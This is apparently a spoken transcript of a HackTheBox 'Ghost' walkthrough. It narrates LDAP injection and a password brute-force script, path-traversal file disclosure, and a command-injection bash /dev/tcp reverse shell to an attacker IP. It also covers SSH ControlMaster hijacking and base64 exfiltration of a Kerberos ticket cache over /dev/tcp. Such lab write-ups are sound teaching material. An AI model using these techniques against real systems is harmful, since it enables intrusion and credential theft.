What's going on YouTube? This is Ipsec, and we're doing Ghost from HackTheBox, which if you can't tell from the video link, this is an extremely large box with lots going on. It'll start off with LDAP Injection, which lets us not only bypass authentication, but also exfil the password attribute, which gets us into Gitea that hosts two applications. One has a file disclosure vulnerability, and the other is a command injection vulnerability, but the command injection requires reading an API key. So we can use the file disclosure to read the API key, exploit the command injection, and land in a Linux container. There's a handful more lateral movement steps, but that leads to dumping the Active Directory Federation services so we can perform a Golden SAML Attack to trick a website into thinking we're the administrator. This website is an online SQL Shell. We can use that to enumerate linked databases, permissions, and discover. We can impersonate SA, which leads us to a shell on this box. However, it's the admin of a child domain, but there is a bi-directional trust, so we can create a inner realm KRB Ticket, which lets us get administrator on the parent domain. So with that being said, let's jump in. As always, we're going to start off with an nmap. So -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it Ghost, and then the IP address of 10.10.11.24. This can take some time to run, so I've already ran it. Looking at the results, we have 18 ports open, and that's only the top 1,000. I'm sure if we scanned all ports, we'd get more open, but let's just go take a look at what we have. We have DNS on port 53. The banner says Simple DNS Plus. This is the default banner for Active Directory, so we know this is going to be a Windows box running Active Directory. We also see HTTP on port 80. The banner tells us it's Microsoft HTTP API 2.0, which means there's no routes configured here for this endpoint. So there's probably some type of hostname we could give it to get like an IIS web server. I'm not exactly sure what's going on here, but that is just something to note. We do have a web server running. Let's see, we have KRB, that's standard for an Active Directory. Here is LDAP. It's giving us the domain name. So let's go ahead and add this to our host file. So sudo v etc host, and then we can add 10.10.11.24, put that in. And let's see, on the certificate, we also get the DNS name, which includes the host name of the box. So we can go ahead and add that, dco1.ghost.htb, and I'm just going to add dco1 as well. Let's see, certificate, we have 443, so we have HTTPS running. It's not giving us any host name or anything like that. It's odd that nmap's not giving that. Let's try HTTP 10.10.11.24. HTTPS, not secure, and I'm not seeing any certificate. More information? Okay, I'm not exactly sure what's going on there. Maybe there's like client validation as well. I'm not sure why we don't see a certificate, honestly. We have SMB, probably more KRB stuff, LDAP, same common names. We have MSSQL on port 1433. There is a certificate here. Common name is SSL self-sign fallback, so we're not getting any additional box name or anything like that. So it's just a self-sign certificate on SSL. I'm not sure what port 2179 is. 3268, another LDAP port. That is all standard. More LDAP. We have remote desktop, giving us all the same information that is DC01. Port 8008, this is interesting. We have the banner telling us it's Ubuntu running on Nginx, and the TTL is 127. So I expected, since this is probably going to be a VM, I expected to see it decrement by 1, so it would be 126. I'm not exactly sure why it's not decrementing. Maybe this is like WSL. I'd have to look more into the virtualization technology to find out why that is, but nothing too interesting here other than we have two operating systems at play, Ubuntu on port 8008 and 8443. And we have another DNS name. This is core.ghost.htb, so that's probably going to be the Linux box's host name of core, I'm guessing. We can add both of those, and I'll also add core as well. Let's see, and that's it for the ports. So we had a lot of data in that nmap. I'm just going to do a sanity check. So we'll do grep ghost.htb. Let's do a -i on the nmap. And that's a lot of data. I'm going to add a -o capital P, and that's going to show me only what my grep is. So right here, we'll just get a lot of ghost.htbs, but I can add A through Z, 0 through 9, and then .ghost.htb. we actually want to add a star here to match all those characters. That's looking better. Not sudo. Sort is what I want. Sort-u and core DC01 ghost. So I think we've got all the host names out of the nmap results. So let's go to 10.10.11.24. This is the HTTP page. We can try other host names. So we could do, what was it? Ghost.htb, not found. We could do DC01. Try core as well. See if we get any other pages. We do not. There was also something on port 8008. So we'll do HTTP 10.10.11.24, 8008. And there's also a web server on 8443. This is going to be HTTPS. So we can try all of these to see what happens. I think this one was core. It is. Let's just accept and continue. And we have AD Federation login here. So we have some type of federation going on there. We have a blog here. And glancing at the post, we have a potential username. And this just looks like it is some type of ghost hunting blog. So what I want to do is see if we have any other virtual host. If I click home, it goes to ghost.htb, which, wait, is that what happened? Yeah, home goes to ghost.htb, which is not found because it's on port 8008. Okay, so let's go ahead and run gobuster. And if I do this, it's actually, I don't think, going to work that well. And I want to highlight something real quick. So I can do ghost HTTP, port 8008. The word list is going to be opseclist discovery, DNS. Then we want to do subdomains, top million, 5000.txt. I think that's good. And what I want to highlight that I don't like about gobuster, I don't know if this is just because I'm on a really old version, but it's not telling me the status codes it's matching, right? And the vhost. I think if we did like the dirbuster mode to like go with files, it would show status codes it's matching, but that's causing it not to show something. And I really hate that it just doesn't show that. If I moved over to FUF, we can do FUF. Let's see, it's -u, HTTP, ghost HTTP, port 8008, like that. Let's just put this in quotes. The header is going to be a host header. So we'll do fuzz.ghost.htb and the word list opseclist discovery DNS, subdomains top million 5000. And then let's do I'm going to filter size 7676. And then we also see we're only matching a few response codes. 307 is here, which I think is the one we want. But normally when I do this, I just do a -mc all to match all status codes. And I filter on the size that is the default one. So we see intranet right off the bat. And intranet never comes up on gobuster. I wonder if I'll just pause the video and we'll let both of these run and we'll examine the results after. Because there's one thing I want to do afterwards to like cover more basis. But let's let these two things finish, because if we run too many scans at once, it slows them all down, and then we start getting error messages as well, and that just becomes a mess. So I'm going to pause the video for a minute. Okay, we can see that the FUF has finished and gobuster is just wrapping up. Gobuster still hasn't found anything because the response code that matched was 307, and I don't think that's what gobuster is matching on. But whenever I do fuzzing like vhost, I always like to match all status codes and then just filter on what the default thing is. You could probably also use FUFs like auto calibration, but I always hesitate towards like auto calibration with fuzzing just because I really like to know what I'm excluding. That being said, there's a lot of web services at play, and the virtual host may only work on one port, right? There's probably other subdomains, as we saw over on this box, which was the 8443 port that had core, right? And I don't want to fuzz every single web service, because I think there were 4 different ones. There is a like single point of truth, and that is going to be the Windows DNS server that we have. And we could just easily enumerate that. The first thing I'm going to do is open up NSLookup and just see if it's configured that way. So I'll do server 10.10.11.24, and then I'm just going to do intranet.ghost.htb because that's what the FUF down here told me. And yes, the server responds. If I did something that doesn't exist, we see it can't find address. So I'm going to use GoBuster. There's probably other tools as well to do DNS lookups, but if we just do DNS, let's see, what are the options for this? I forget exactly them all off the top of my head. So we'll do -H. Let's do the resolver. So custom DNS server. So we'll do 10.10.11.24. The domain is ghost.hdb. And then the word list, that's going to be the OPSEC list discovery. So now we're just going to do just DNS request, and we find intranet.ghost.htb. Let's go ahead and add that. We find Corp, we find core. There's the global catalog, which is just standard in Active Directory. And there's probably going to be a few more. So let's just start adding to our host file. Core, let's do intranet.ghost.htb, corp.ghost.htb. Core is already there. These are standard Active Directory. We don't have to worry about those. And if we start going to these, so let's go intranet.corp.htb, port 8008. That's not what I want to do. HTTP, intranet.ghost.htb. That's what it is. Let's do port 8008. I can't type. There we go. Third time's the charm? Apparently not. Did I not save this yet? Yep, I did not save the domain. So we have a different login here. Let's see what else we found. It doesn't look like anything else. I don't know what corp is. Let's see. Can we do corp.ghosthtb? See if we get any pages here. Nothing. Let's do HTTPS. Secure connection failed. 8443. Let's see. Is this bring us anywhere? That is the same thing as core. So let's try 8008. And I don't think this is going to work because it didn't come back on our FUF vhost scan, right? So we got a subdomain. We don't exactly know what that is. But we have this intranet. So let's try logging in. So I'm just going to try like admin. And we get invalid combination of username and secret. So let's look at exactly what this is doing. So I'm going to go over into the proxy. We can intercept, go log in, look at this request in repeater. And let's see. We see headers. It's using probably Next.js here. We see, looking at it, we have LDAP username, LDAP secret. And since it's LDAP, we can probably try like wildcards. So that's just going to be a single star as a wildcard. So we're testing for LDAP injection here. And if I hit enter, we can see it sends a 302, and that looks like it logs us in. So let's go ahead and just try this. So I'll turn intercept off, and we can do **, log in, and there we go. We have bypassed the authentication. So we have a Git migration. We're currently migrating Gitea to Bitbucket. Domain logins to Gitea have been disabled. You can only log in with Gitea temp principal account and its corresponding intranet token as a password. We can't post the password here for security reasons. Look at LDAP attribute, new intranet portal. If we look at users, we have a list of usernames. We can see Gitea temp principal is a username. And we can also go back to our LDAP injection and try this out, right? If we do a username that does not exist, we're going to get that error message of invalid combination. But if we do a user that does, let's try Catherine Holland. Paste this. It logs us in. It's saying Gitea temp principal is also an account, and it logs us in as well. So we have a way to bypass auth here. If we're looking at the forum, I tried connecting to Bitbucket Ghost.htb. It doesn't work. Migration isn't there yet, so DNS entry is not configured. And this is going to become important later on. I think these blog posts really aren't saying all that much. So let's go ahead and see if we can brute force this Gitea temp principal password, right? because we need to use this for Gitea, and we haven't found a Gitea DNS name, but that may just not be in our word list, right? If I grep-i Gitea on this, we have nothing. So I'm just going to test this out. Let's go, let's just add it to our host file and see if it works. So it's probably going to be gitea.ghost.htb. Save that. And then let's try HTTP Gitea ghost HTTP port 8008. Yes, we do get a login. So we need to get the Gitea temp principal password. And we can do that through LDAP injection. Now, LDAP injection is a little bit finicky in the terms of like what you have access to do. You can only really brute force things one character at a time because the wildcard is only a star which matches multiple characters. Like if we did star, that's going to fail login because you can't do 2 wildcards in a row, which is a little bit odd, but okay. There's also no like question mark to match a single thing. The only wildcard is star. In some LDAP implementations, you can do regex, but that's not exactly common. So what we could do is like see if the password begins with something. So we could go like A star, invalid combination, B star, and eventually we get, oh, the first character of the password is S. So we can do some type of Boolean logic in order to test for this. We can also do a lot of word list pruning by doing like star S star. And this is going to see if the password contains S, right? And LDAP star will match beginning of string as well. So even if S was the first character, this would still match. And we can kind of test that out, I believe. Let's see. I don't know a good way to test that. You just have to kind of trust me on that. We'd have to like examine, let's see. Where is it? Examine the users and find a character that's only in one thing. Oh, I found it. Z. Let's see. It would have to be at the start. Okay. No other username has F in it. So that's a good one test. So we could do star F star. And that matches. And it's really Florence.Ramirez, right? There's no other Fs here. So that completely matches. Also, it is not case sensitive. So we can say it begins with F, begins with capital F. That matches. And we also knew this password begins with S and capital S. So we have a good way to brute force this. Now, whenever I like code things, I hate sending like URL forms. So before we go over into Python to kind of automate this, I'm just going to see if we can get this in another format just to make it a little bit easier for us. So we're going to change this to, I think it's application xwww form URL encoded, right? I think that's the default one. And then let's go with the variables we probably need. And I'm going to do 2 requests actually, because I'm going to be butchering this one. We want LDAP username. That's going to be star. We want to get the secret as well. So we'll copy this. And then I'm going to delete everything below. We'll copy here, highlight. That is erroring, so we missed a field. Let's look at other things we have. I'm going to try, let's see, invalid combination. Is that it? That should let us log in. Okay, that's the login. I'm going to try this action 1-1. So we'll go here, like this. Is that going to let us? It does not. let's see. Let's try 0. We need to copy this. There we go. So we need this variable as well. And this is just like a flash message. I don't think we actually need that whole string. I think we got that because that was the last message the web application sent us. I wonder if we even, can we just do like an empty list? No. So for some reason we need this, but now we have a easy way to test for login, right? Because we can now brute force characters. Yep, this is working just fine. So what we'll want to do is move over to Python. So I just want to write this principal. And let's go open up a new pane, make dir. We'll call this LDAP brute. Go here, touch. I'll just do app.py. So I'm going to open up Z, which is just another IDE. I normally use VS Code. I'm just like trying other things. I like how quick Z is. VS Code sometimes does get a little bit slow. Z isn't that great in VMs because it uses a lot of like GPU type stuff, and the GPU pass through to VMs isn't great. If you use it on a host operating system, it's much snappier than a VM, but it's still good. So let's import the request object. And the very first thing I want to do is make sure we can make a request over to the web server. So we'll do a request.post http intranet.ghost.htb. It's got to be port 8008. I want to say it's /login. And then we got to send the data. We'll say that's equal to payload. And we'll say payload is equal to, go back over to burp. We'll copy this. And we will paste this in. Okay. And then we want to print our.status code. And I'm also going to print our.text. Now let's run this. And that's not what we expected. We're getting a bunch of text, and we get this page could not be found. So we get some type of 404. I bet if I scroll all the way up, it's a 200. But we're missing something in a request. I'm going to add the content type of xwww just because that's generally like how form data is, right? So we can add this content type, add it to the post message, save it, and we'll see if that fixes it. It does not. It could be one of the like Next.js routing headers. If we go back over to Burp Suite, we do have like next action, next router state tree. So I'm going to start adding these to it because I don't think these headers really mean too much. Like origin, DNT, like those probably aren't needed. It's probably something specific to the routing. So let's go ahead and add this. So add that. Let's add these single quotes. There we go. Print this. We need a comma. There we go. Awesome. That works. So if I change the password to be does not exist, save it. This should be the 200. Yes. So now what we want to do is move this over to a function. So we can say def, we'll do test password, and we'll pass in the password, and the username will have a default variable of getTtemp principal, like that. And then we want to convert this over to a f string, change this to be username and password. And then this one, we have to escape, and we escape by just doing doubles. Okay. And now we need a return. So we'll do our status code is equal to 303. And we're doing that because we're returning the value of this. If it's not 303, then it's not a login success. So that's why we're returning false there. So that should be fine. So we can now do a print test password of star. And we'll do a test password of not the password. Save, run it. There we go. That looks good. So now the next thing is I'm going to do something called character set pruning. And I'm doing that because let's say we know it's not case sensitive. So that's going to be 26 characters. And then it could also be digits, and that's 10 digits. So that's 36. Let's just say the password was 10 characters long. There's a theoretical maximum of 36 times 10 requests we make, which is 360, right? If we do character set pruning, we can make 36 requests one time, and then we get a list of every characters that are in the password. And if it's 10 characters long, there can only be 10 characters in the password, right? So that'd be 10 times 10. And that would be 136 maximum request. So theoretically, if we do request a character set pruning, we're lowering the number. Now, I would prefer to do like binary search or divide and conquer. And that would be you make a request and you divide, like you eliminate half every time. But since LDAP doesn't support like regular expression, converting characters to octal format and doing if or less, we can't do that, right? Let's say it did. If this was like no SQL, we could do regex. We could say, hey, is the password A through M? No. Okay. Then it's N through Z. And then the next one, divide that by half and divide that by half, divide that by half. So if it was conquer and divide, then you go from 36 to 18 to 9 to 5 to 3 to 2 to 1. So every request would be 1, 2, 3, 4, 5, 6, 7. Right? I think that's 7. And then you'd have 70 requests total. So divide and conquer would be the quickest, but LDAP doesn't support that. So let's go ahead and make our prune care set. So we'll do definition, prune, care set. And let's see. I'm going to import string. And we'll say result is equal to nothing. And then we'll say for C in string dot, is it lower ASCII lowercase plus string dot digits. And if test password C, that's almost good. We need to make that a star, C star. Okay. And then we can say char set is equal to prune char set. And we probably should add username is equal to like that. Username is equal to username. And print char set. Hopefully this works. Let's just time it. I think this takes probably around 10 to 15 seconds would be my guess. So while that goes, let's start working on the brute force logic. There we go. We got all the characters potentially in the password. So let's do def brute force. Let's see. What are we passing in? We'll do the character set and default username. And I don't know why it's looping by 10. I guess it knew the output I did before. That is weird. Let's see. We want to do a while true. And then let's see. For C in char set, like that. Oh, this is going to get messy. I'm probably going to have to break this out in another function because what I kind of want to do is like put found is equal to false here. Then we do found is equal to true. And if we exit this, if not found break, does that work? Don't know if this will work. We can try though. Password is equal to that. Print password, save it. It may work, it may not. I really hate when you do like these infinite loops and have like multiple breaks, because it's hard for me to figure out where, like, what break is going to break out. I'd rather put this into its own separate function. So do def test character. And let's see, we can say, hold on. I noticed an error right here. We're doing test password. We don't want star password like that. There we go. Okay, def test character. We're going to pass in the char set and then the prefix of the password and username. That looks good. So with that, we can just do we can say if test character, and let's see. I think I did get the password. I think that is the password. So that worked how we had that weird nested loop. So that's totally fine. I think this is just more readable. So do test password, pass in the char set, and then what we have for the password so far. And then we'll say password plus equals, say, result if result does not. I think that'll work. What is happening? There we go. I think that's good. Yeah, I think this is pretty much doing the same thing. But I think it's a bit easier to read. Let's just save that and test this out real quick. It should take 40 seconds, so I'm going to pause the video and I will resume when this finishes. Okay, it finished and we still got the same result. So I like writing it this way a bit better. I find it easier to read than doing that weird nested thing. But I am probably going to rewrite this entire script in Golang in a separate video and do a bunch of just Golang for hackers type stuff, teaching people Golang. So if you want to see this done in Golang, definitely subscribe to the channel and keep an eye out. But let's copy this and see if we can log into Gitea. So we'll go back here and it's Gitea temp principal. Put in this password, click on sign in. And we have two projects. We have blog and intranet. So I'm going to look at intranet first because that's what we have been hitting. And it looks like we're adding new features that integrate into the blog and intranet. See the blog for more details. Until development is done, we'll expose the API at Intranet Ghost API Dev. So let's go ahead and download this. I'll download the tar. I think that's downloaded. Oh, there we go. Save. And now let's go here. I'm going to let's just make a directory real quick. Gitea tar xvf downloads. Was it intranet something? There we go. Okay. So let's look at the backend. And looks like the source code is here. So let me close out of this. Let's open up this. And I think I need a -n. Nope, this looks like it's fine. Awesome. So let's look at main. So this is going to be a Rust application. And since it's labeled intranet, I'm guessing it's the source code of what we have been hitting, right? So if we scroll down of main, we see Rocket, which is like a Rust web framework. Think of it kind of like Flask or something like that in Python. But we're mounting /API, and then we have this login function. So I'm just going to look at login real quick. So if we look at login, let's see. We have the function login, and it's just going to take the body of LDAP username and LDAP secret, and then run it against LDAP connect, which is this function. And this is how, like the thing we were attacking in Python, right? So we're going to go, this is our LDAP query. And then we take the results and save intranet secret and SAM account name and unbind. So since there was no sanitization as we pulled the username and password, this is where we injected. And this is the LDAP query. Knowing this, we could even test like other things. So let's go back to this real quick. So we have LDAP username Gitea temp principal, the secret. I'm going to do a star and then single parenthesis, and then we can say, let's copy SAM account name. So let's do SAM account name is equal to star as well. Does that work? It does. So what we did was just change this, right? We're injecting here. We exited out of this parenthesis. Then we added our other attribute and then let it close out. So we could test this. If we do SAM account name is equal to nothing, we get invalid. So this is just showing we could have brute forced other things in Active Directory LDAP. The password is not stored in LDAP for Active Directory, so we can't actually exfil the user's password. And I know you're like, we just exfilled the password, right? This intranet secret is a attribute the box author added into LDAP itself. That's not a default LDAP attribute. I'm talking about like NTLM or other passwords of the user. So hopefully that makes sense. We can play with LDAP more if we wanted to, but I don't really want to. So let's move on. The API dev endpoint sounds interesting. So let's look at scan. So I'm going to go into scan.rs and we'll see what this does. So scrolling down, we can see right off the bat, we have this public function. I don't know exactly what guard dev guard is. We could always like ask AI. I think I have that set up. Let's do add the file, scan to my question, and what is dev guard doing here? And dev guard looks like it is a request guard and rocket used to enforce certain conditions like authentication. So we'll look at that in a minute. I just wanted to show like how you go to AI and other things other than VS Code. Why is that? There we go. Close that. So let's see. We have result is equal to command new bash. We do -c and then intranet URL check. So this is definitely going to be command injectable. So if we can hit this endpoint, we have a potential command injection. So let's try this real quick. Let's go. It is a post request in JSON format. So we'll do post API dev /scan. And then application JSON. And then we want URL And we'll do semicolon ID semicolon. Send this. We get unauthorized, null. And again, that's because they have this guard. So there's authentication at play. So I'm going to go up to the top. I'm going to go look at what this dev guard module is. And if we look at it, we take the request and we're getting the header xdev intranet key. And then comparing that against what the environment variable is. And if they don't match, then we get unauthorized. So for this request to work, we need to know what this xdev intranet key is. Right? If we go back to Burp Suite, we can add this is equal to none, null, equal to nothing, null. So we need to know what this key is. So we need to find some type of directory, file disclosure on this server so we can read the environment variables. And if we go back here, if we go over to Ghost Dev, they do have the blog. And reading this, they've modified the Ghost CMS code to accommodate some new features. One is postpublic.js. So what's happening here is the Ghost blog, which is the very first tab I have. These posts aren't stored in Ghost itself, and Ghost is just a content management platform, Ghost CMS, not CMD, CMS GitHub, right? And they've replaced something in this to pull post out of the Rust application, essentially. That's what it looks like to me. If we look at the Docker Compose, we can see the database connection file name. This is a SQL Lite Database. They've redacted the dev intranet key here. We could just test that out to make sure that isn't the actual key. Nope. And then let's see. I bet in the Docker file, that's where they're copying it, maybe? That was the compose, right? Copy post public over top of that. Is there something that has environment? Maybe it's in volumes or something. But let's look at what this postpublic.js is. So we're looking for something that could be a file disclosure because we know that's what we need for the Rust service. And we have something here. So if extra, file system read sync, varlib goes to extra, and then we're adding this payload. So where are we getting extra from? Let's just look at it. Let's go up. Let's see, extra frame original query. Okay, so we have to get to this. So looking at this, let's see. The post public, and they give us an API key. So we have to figure out how to hit this JavaScript file. So I'm going to do Ghost API post maybe. Let's see, content API for Ghost. Ghost API / content. Let's try this. Go back to Burp Suite. Repeater. Let's just intercept a new request. Not that. This should be fine. Send this request. Resource not found. We also need, was it key is equal to, what'd they say? Like this. Okay. So let's go back over to the content API. They have question mark key like that. We just did that. And then get, here we go, post. So let's try, is it post or post? Okay, moved permanently. We have a slash. There we go. So this is probably going to be the JSON we hit. And they added a variable called extra, right? If we go back here, extra frame original query. So let's try saying key and extra is equal to, let's do a bunch of dot slashes, etc passwd. And do we see the file? We do. Awesome. So we have a file disclosure. So I'm going to change this over and switch to curl just because I find that easier. So we'll do curl HTTP Ghost HTTP 8008 like this. I also want -s-q, put it in single quotes. Because now I can do jq dot. Is it dot meta? Then dot extra first item. Let's see. How do I get the first item out of this? Okay, that works. Then do -r for raw, and now we can read files. So let's now get the environment. So we'll do proc self environ. Paste that. And if we xxd, we can see there's a lot of null bytes, and that separates each item, right? If we just do this, we can read that, but it's a bit better if we just do sed s, replace null byte with \r\n. And there we go. I find this to be easier to read. And the first thing that sticks out to me is this database. I know we probably want this dev intranet key, right? If we copy this, go back to Burp Suite, paste this here, we still get null. Why? Oh. Because it's a colon, not equals. There we go. So maybe one of those previous things I had tested for worked. Probably not. But there we go. We have that working. However, I do want to get the database. So I'm going to copy this. And let's see. I'm going to change this to be proc self current working directory, the database. And I'm going to do this to be ghost.db. And let's see, do we have it? Maybe a binary file. That looks good. SQL Lite 3, ghostdb.dump. We have some type of corruption. I'm guessing maybe because it was in JSON format, some character didn't translate well enough. So I'm going to do the lazy thing and just strings this. And let's see, I'm going to grep for user. And we're just looking to see if we have any password hashes, right? Let's see. User ID. Maybe I should also grep I insert. That didn't work. We can probably grep for $2. There we go. Because that's bcrypt. A lot of things store things in bcrypt format. And we get a hash for Catherine. Now, this can't be cracked. You don't really need to do this step. It's just something I would do whenever I have a file disclosure and see it's using SQLite. I always like exfilling the database and just get those hashes right away. But the key thing was getting the key, this dev intranet key, then going for command injection on the API dev. So now we can do --c, --i, dev tcp 10.10.14.8, 9001, 0, and 1 like that. close out the single quote. Let's do nc lvn. I'm just going to start working in a clean directory. Save that, and we get a shell. So let's upgrade our TTY. So import pty spawn, bin bash, stty raw minus echo, foreground enter enter. Export term is equal to X term, so we can clear the screen. So we know we're probably in a Docker container just because of the host name, right? I could do lsla on /, and yes, we do see docker env. We could cat the Docker entry point and see exactly what's going here. And something odd, we have that SSH Control Master host here. If I did a ps-ef, normally like --forest as well, we can see, well, there's a reverse shell, but we have a defunct SSH process, and it's using this control master thing. So if I go in root, if we look at .ssh, there is control master. If we look at it, we see Florence.Ramirez at Ghost HTTP dev workstation. And what SSH Control Master is like, think of it as saving a password cookie for SSH connections. So he opened up a SSH connection to his dev workstation. And because he's using Control Master, that means other SSH connections can piggyback upon this one. So if I just SSH and specify this full thing, it's going to use the authentication that was previously used. So we're going to do this, and there we go. We've just logged into the same box. We didn't need a password, right? If we change it out, I think if we just had, hold on, SSH, I probably should like set the columns and whatever, but bear with me real quick. We do this, it's going to ask for his password, right? Because we're not specifying the whole control master file. So definitely Google like SSH Control Master if you don't know exactly what's going on here, but we're just using the password in memory because it's set up to save that authentication in memory for that. So we're on dev workstation as Florence. And this is a Active Directory user, I believe. If we go back over to, do we have it here? Let's see. Yep, we're here. Florence.Ramirez is in IT. If we do IPA or ifconfig, I guess, there's cd proc. Let's see, what are we first? If we do uname, Ubuntu, I'm not sure if like it was Windows subsystem on Linux, if it would say on uname output. Let's see. What would tell us? I know there's a way we can see the like hypervisor info, which I think is in like DMI decode. We don't have the binary. That's, if you don't know, DMI is like desktop management interface, I think. It just stores a bunch of just like hardware type statistics. That file, a program reads out of sys class. What is it? DMI? Is that it? There we go. ID. Here we go. So we can just read files out of here. Is it BIOS release? Sysclass DMI ID BIOS release. Okay, it's probably BIOS vendor Microsoft. Okay. Board name. So it is a VM. This is probably Hyper-V. I'd have to like play with WSL to see if that changes things. Product name, virtual machine. I was hoping to see like Hyper-V or Windows subsystem on Linux, but I don't think I do. But this is always something good to check if you're not sure if you're in a VM or not. Subsystem. What did I just go into? Is this like an infinite loop of just directories? That's funny. Yeah. So nothing too interesting there. So let's see. The other thing I want to do is get like the net address. So net Where is IP? Raw? That's not it. TCP. Let's see. This is IPs encoded in hex. Any interface, that's 127. This is probably the IP address, just encoded in hex. I want to say this is either 172 or 192. This is 16, so this is probably 172.16.02. Let's see. Python 3, int, AC 16. Yeah, 172. So this box's IP is 172.16.02. Not really important, just showing the things we can do from enumeration. If we look at klist, and I'm looking at klist because this is definitely an AD user, and it's probably going to be logged into Active Directory. There's probably something we could see in Etsy. I don't know what to look for off the top of my head, but we see the ticket here. So tickets on Linux are stored in temp, and then KRB 5cc, I'm guessing the user's ID is 50, or it's the group. Oh, nope, user ID 50. So KRB 5cc underscore the user ID. So I'm going to base64 encode this, and then we're going to send this to dev TCP 10.10.14.8 9001. And let's do NC LVMP 9001. I'm going to call this Florence.Ramirez.cc cache. Let's direct it to a file like that. And we probably should rename this to say it's also .b64. So I want to put this klist on my machine. So my user ID is 1000. So I'm going to do a base64-d on this file, and we'll put it to temp krb5cc underscore 1000. And now if I do a klist, I've copied the certificate from his dev workstation onto my machine. So we should be able to do export krb5cc name is equal to temp this file. This just makes it easier to use for like other programs. So I'm going to do netexec, and then we'll do smb 10.10.11.24. And we want to say, where's Kerberos options? Use kcache. And see if we authenticate. And it looks like we do. So we have authentication now to the Ghost domain. So what I want to do now is run Bloodhound. So do opt Bloodhound and gestures, bloodhound.py, bloodhound.py. Does this just run? It looks like it does. I wasn't sure if I had to go like into a virtual environment or anything like a VM. I'm going to specify -k. We'll do -no pass. D, the domain, ghost HTB, -u, Florence.Ramirez, zip, and then is it NS for name server, 10.10.11.24. Connecting to LDAP, DC01 ghost HTB. This looks good. And it's taking a little while to connect. I wonder if like we have to do secure LDAP. That's very possible. Normally when it takes this long, that's my first thought. Let's do ping. We can ping that host. And most timeouts are within 30 seconds. It's probably approaching that, so I'm guessing we'll see the error message any second now. I'm going to copy this real quick. We will run the same thing, and I'm going to add the use LDAP S and principal unknown. Username does not match. Let's see. Did I typo his name? Copy, paste. Let's just delete that. Let's see, unknown. KRB TGT, default principal. This should be working. Maybe it's DNS TCP, not name server. DNS TCP. Oh, wait. That's not it. Is name server flag. It is. Let's see. Does this have to be capital? Something is going wrong here. Oh, I need -- use LDAP. And it should still come. Let's see. Let's do sudo Wireshark. Kill that. I know this is not capital because I'm not used to capitalizing the domain name. Let's do ton0. It's going to connect. And I think I see what may be happening. The font size is small. There we go. We're getting 2 responses back when we query for DC01 Ghost HTTP. This 10.10.11.24 and also 10.0.0.2.54. And I bet it's trying to connect out to 10.0.0.2.54. Let's stop this. Let's go on any. IP.dst is equal to 10.0.0.24 like that. And yes, I am trying to talk to that. Is this over LDAP? It is 636. Watch. I will stop that, restart, and we see more connections. So how do we stop this? Let's see. Sudo IP tables -d? No, a -d 10.0.0.0.24 j reject. Why is that bad? -p TCP. Oh, we need output like that. The chain. And we don't want TCP. There we go. Now we have created a rule to block everything. So if I even try to like ping 10.0.0.2.54, operation not permitted. So now let's run this. Ghost Florence name server. Okay. And it's still reaching out. I wonder if we just have to run this enough times where we get lucky and it doesn't attempt to use 10.0.0.2.54. That has to be it, right? Let's cp temp KRB5 here. I'll remove that to be Florence CC cache KRB5 CC name, just in case this is it. Then we can do Python 3 like that. Let's see. Or IP destination is equal to 10.10.11.24. That's 8008, so that's my web browser doing something. But yeah, it keeps just going over to that 10.0.0.254, which is an internal IP address. I don't know how to prevent it from doing that. Or then maybe we just get lucky, which I don't like. Connecting to LDAP server. Just going to run it a couple times. I wonder if it's like time-based. If we waited like 5 minutes and ran it again, if then it switches. I don't know how Windows is doing the routing here. Let's see, LDAP channel binding. Don't know what that is, but maybe. Prefix name, computer file. Like maybe computer file. Skip DCs, no. Worker enumeration. Collection. I wish it gave us an option for like specifying the IP address of the LDAP server to use. Because that's definitely, that's port 8008 still. Like we're not talking to 636, 8008, 8008, 8008. So no request is going to an IP address we can talk to. Did we get lucky there? Nope. Let's see. Bloodhound, what does this look like? Is there any examples? LDAP channel binding. Don't know how to use this option. Use LDAP. Do we just specify that? That's not it. Okay, let's see. We got an error message. Cannot authenticate to LDAP. Check your credentials. Connection timeout. This is definitely the issue. We just got to get lucky and have the DC return 10.0.0.254. Or not 10.0.0.2. We have to get lucky and have the DC return the 10.10.11.24 address, which is silly. There's got to be a way around that. Nope. Okay, we're going to try this one last time and then do something really, really stupid. Yeah, none of them connected. Okay, let's go the nuclear route. Let's go into this directory. And then the bloodhound.py, grep-ri LDAP. Let's see, where are we using this? Probably AD authentication. Let's see. Get LDAP connection. and Bloodhound's passing in IP here. So I'm just going to set IP here. And we definitely have to remember to edit our file back after this. But I'm just going to hit enter. It's connecting. Come on. There we go. So that's definitely the problem. I don't know why we can't specify the LDAP IPs, like hardcode it, but oh well. We will delete that nasty, nasty hack and be happy we have Bloodhound data now. We do ls. Yes, we do. So let's start up Bloodhound, and I have it cloned to auth Bloodhound server. And then I can do docker compose up-d, and we're going to specify bloodhound underscore port is equal to 8088. And the reason why we're doing that is because it defaults to 8080, and I have Burp Suite listening on that port. So we definitely want to change it to 8088, and that will start it up. It may take a little bit to start up. While that does, I'm going to unzip this data, and we can just take a look at the users if we wanted to. So we could do like JQ dot and see what type of things we have. It looks like Bloodhound is started, so we can do localhost 8088. And then email address, admin, and I have my password set to please subscribe, 1 exclamation point. I hope. Yep, that let me in. Let's turn dark mode on. And then let's see. What do we want to look at? Well, we have to first go to administration and upload the file. So let's go to HTTP. This is Ghost. Add the zip. Open. Upload. Upload. And it will take probably around a minute probably to ingest. So I'm just going to pause the video and we'll come back once this is done. Okay, it is done ingesting. I'm not sure why the first one canceled. I just redid it and it worked the second time. But let's now go into Explorer and we can see what type of data we have. So if we just go to Cypher, we can click around and see what we have. If we click all domain admins, it looks like there's just one that is administrator. We can map domain trust, and we do see there are 2 domains, and it's got a bidirectional trust. We can see this one arrow is pointed one way and the other arrow is pointed the other way. So we have bidirectional trust, which comes in handy later. We'll get a shell on Corp, and we'll use this shell to create a inter-domain Kerberos ticket that allows us to access the parent domain. But we're getting a little bit of ahead of ourselves right there. We could look through other things to see if there's anything interesting. I don't think there's any good queries to run here. We could go with Florence and see what this user can do. We can mark them as owned because we have owned them, but we don't have any privileges. Inbound control is not really that interesting because that's just all the things that can access the user we have owned, but we don't have anything here. And one of the things I generally do when I don't know where to start with Bloodhound data is I'll do a grep. So let's grep star.json, and I'm going to do -i write, I think. Let's see, write name. Let's think what I want. Maybe let's do the users. That may not be what I'm expecting. Oh, I'm grepping the whole JSON blob. Let's go cat user jq.grep-i write. Is that better? There we go. So we have a list of all the writes in this, and we can do a sort-u and then start looking at what writes there are and what things are interesting. So we have generic all. We could look at this. It's probably going to be like the domain admin over something. But let's go back over to 